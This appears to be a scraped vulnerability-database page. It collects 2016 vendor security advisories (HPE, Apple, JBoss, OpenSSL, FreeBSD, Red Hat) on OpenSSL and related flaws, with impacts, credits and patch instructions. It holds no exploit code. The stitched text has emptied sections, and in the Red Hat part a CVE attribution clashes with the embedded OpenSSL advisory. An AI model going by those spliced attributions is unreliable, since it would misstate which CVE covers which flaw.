7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4538
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4539
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4540
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4541
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4542
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4543
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-5385
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CVE-2016-5387
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CVE-2016-5388
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
- Hewlett Packard Enterprise thanks Tenable Network Security for working with Trend Micro's Zero Day Initiative (ZDI) for reporting CVE-2016-4395 and CVE-2016-4396 to security-alert@hpe.com
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities for the impacted versions of System Management Homepage (SMH).
Please download and install HPE System Management Homepage (SMH) v7.6.0 from the following locations:
HISTORY Version:1 (rev.1) - 26 October 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004
OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:
apache_mod_php
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
Description: Multiple issues existed in PHP versions prior to
5.5.36. These were addressed by updating PHP to version 5.5.36.
CVE-2016-4650
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher
CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo
Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher
IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins
IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher
libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco
LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck
libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab
Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD
Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins
Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900
OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222
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The References section of this erratum contains a download link (you must log in to download the update). (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)
-
This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
-
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat.
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6
Show details on source website{
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"description": {
"_id": null,
"data": "Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data. OpenSSL is prone to an integer-overflow vulnerability. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \nFollowing product versions are affected:\nOpenSSL versions 1.0.2 prior to 1.0.2h are vulnerable. \nOpenSSL versions 1.0.1 prior to 1.0.1t are vulnerable. OpenSSL Security Advisory [3rd May 2016]\n========================================\n\nMemory corruption in the ASN.1 encoder (CVE-2016-2108)\n======================================================\n\nSeverity: High\n\nThis issue affected versions of OpenSSL prior to April 2015. The bug\ncausing the vulnerability was fixed on April 18th 2015, and released\nas part of the June 11th 2015 security releases. The security impact\nof the bug was not known at the time. \n\nIn previous versions of OpenSSL, ASN.1 encoding the value zero\nrepresented as a negative integer can cause a buffer underflow\nwith an out-of-bounds write in i2c_ASN1_INTEGER. The ASN.1 parser does\nnot normally create \"negative zeroes\" when parsing ASN.1 input, and\ntherefore, an attacker cannot trigger this bug. \n\nHowever, a second, independent bug revealed that the ASN.1 parser\n(specifically, d2i_ASN1_TYPE) can misinterpret a large universal tag\nas a negative zero value. Large universal tags are not present in any\ncommon ASN.1 structures (such as X509) but are accepted as part of ANY\nstructures. \n\nTherefore, if an application deserializes untrusted ASN.1 structures\ncontaining an ANY field, and later reserializes them, an attacker may\nbe able to trigger an out-of-bounds write. This has been shown to\ncause memory corruption that is potentially exploitable with some\nmalloc implementations. \n\nApplications that parse and re-encode X509 certificates are known to\nbe vulnerable. Applications that verify RSA signatures on X509\ncertificates may also be vulnerable; however, only certificates with\nvalid signatures trigger ASN.1 re-encoding and hence the\nbug. Specifically, since OpenSSL\u0027s default TLS X509 chain verification\ncode verifies the certificate chain from root to leaf, TLS handshakes\ncould only be targeted with valid certificates issued by trusted\nCertification Authorities. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2c\nOpenSSL 1.0.1 users should upgrade to 1.0.1o\n\nThis vulnerability is a combination of two bugs, neither of which\nindividually has security impact. The first bug (mishandling of\nnegative zero integers) was reported to OpenSSL by Huzaifa Sidhpurwala\n(Red Hat) and independently by Hanno B\u00f6ck in April 2015. The second\nissue (mishandling of large universal tags) was found using libFuzzer,\nand reported on the public issue tracker on March 1st 2016. The fact\nthat these two issues combined present a security vulnerability was\nreported by David Benjamin (Google) on March 31st 2016. The fixes were\ndeveloped by Steve Henson of the OpenSSL development team, and David\nBenjamin. The OpenSSL team would also like to thank Mark Brand and\nIan Beer from the Google Project Zero team for their careful analysis\nof the impact. \n\nThe fix for the \"negative zero\" memory corruption bug can be\nidentified by commits\n\n3661bb4e7934668bd99ca777ea8b30eedfafa871 (1.0.2)\nand\n32d3b0f52f77ce86d53f38685336668d47c5bdfe (1.0.1)\n\nPadding oracle in AES-NI CBC MAC check (CVE-2016-2107)\n======================================================\n\nSeverity: High\n\nA MITM attacker can use a padding oracle attack to decrypt traffic\nwhen the connection uses an AES CBC cipher and the server support\nAES-NI. \n\nThis issue was introduced as part of the fix for Lucky 13 padding\nattack (CVE-2013-0169). The padding check was rewritten to be in\nconstant time by making sure that always the same bytes are read and\ncompared against either the MAC or padding bytes. But it no longer\nchecked that there was enough data to have both the MAC and padding\nbytes. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 13th of April 2016 by Juraj\nSomorovsky using TLS-Attacker. The fix was developed by Kurt Roeckx\nof the OpenSSL development team. \n\nEVP_EncodeUpdate overflow (CVE-2016-2105)\n=========================================\n\nSeverity: Low\n\nAn overflow can occur in the EVP_EncodeUpdate() function which is used for\nBase64 encoding of binary data. \n\nInternally to OpenSSL the EVP_EncodeUpdate() function is primarly used by the\nPEM_write_bio* family of functions. These are mainly used within the OpenSSL\ncommand line applications. These internal uses are not considered vulnerable\nbecause all calls are bounded with length checks so no overflow is possible. \nUser applications that call these APIs directly with large amounts of untrusted\ndata may be vulnerable. (Note: Initial analysis suggested that the\nPEM_write_bio* were vulnerable, and this is reflected in the patch commit\nmessage. This is no longer believed to be the case). \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nEVP_EncryptUpdate overflow (CVE-2016-2106)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in the EVP_EncryptUpdate() function. Following an analysis of all OpenSSL internal\nusage of the EVP_EncryptUpdate() function all usage is one of two forms. \nThe first form is where the EVP_EncryptUpdate() call is known to be the first\ncalled function after an EVP_EncryptInit(), and therefore that specific call\nmust be safe. The second form is where the length passed to EVP_EncryptUpdate()\ncan be seen from the code to be some small value and therefore there is no\npossibility of an overflow. Since all instances are one of these two forms, it\nis believed that there can be no overflows in internal code due to this problem. \nIt should be noted that EVP_DecryptUpdate() can call EVP_EncryptUpdate() in\ncertain code paths. Also EVP_CipherUpdate() is a synonym for\nEVP_EncryptUpdate(). All instances of these calls have also been analysed too\nand it is believed there are no instances in internal usage where an overflow\ncould occur. \n\nThis could still represent a security issue for end user code that calls this\nfunction directly. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nASN.1 BIO excessive memory allocation (CVE-2016-2109)\n=====================================================\n\nSeverity: Low\n\nWhen ASN.1 data is read from a BIO using functions such as d2i_CMS_bio()\na short invalid encoding can casuse allocation of large amounts of memory\npotentially consuming excessive resources or exhausting memory. \n\nAny application parsing untrusted data through d2i BIO functions is affected. \nThe memory based functions such as d2i_X509() are *not* affected. Since the\nmemory based functions are used by the TLS library, TLS applications are not\naffected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 4th April 2016 by Brian Carpenter. \nThe fix was developed by Stephen Henson of the OpenSSL development team. \n\nEBCDIC overread (CVE-2016-2176)\n===============================\n\nSeverity: Low\n\nASN1 Strings that are over 1024 bytes can cause an overread in applications\nusing the X509_NAME_oneline() function on EBCDIC systems. This could result in\narbitrary stack data being returned in the buffer. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 5th March 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160503.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n. \nCorrected: 2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE)\n 2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2)\n 2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16)\n 2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33)\n 2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE)\n 2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41)\nCVE Name: CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109,\n CVE-2016-2176\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII. [CVE-2016-2176]\nFreeBSD does not run on any EBCDIC systems and therefore is not affected. \n\nIII. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nRestart all daemons that use the library, or reboot the system. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nRestart all daemons that use the library, or reboot the system. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.x]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc\n# gpg --verify openssl-10.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all daemons that use the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/9/ r299053\nreleng/9.3/ r299068\nstable/10/ r298999\nreleng/10.1/ r299068\nreleng/10.2/ r299067\nreleng/10.3/ r299066\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. 6) - i386, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:0722-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0722.html\nIssue date: 2016-05-09\nCVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.5.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 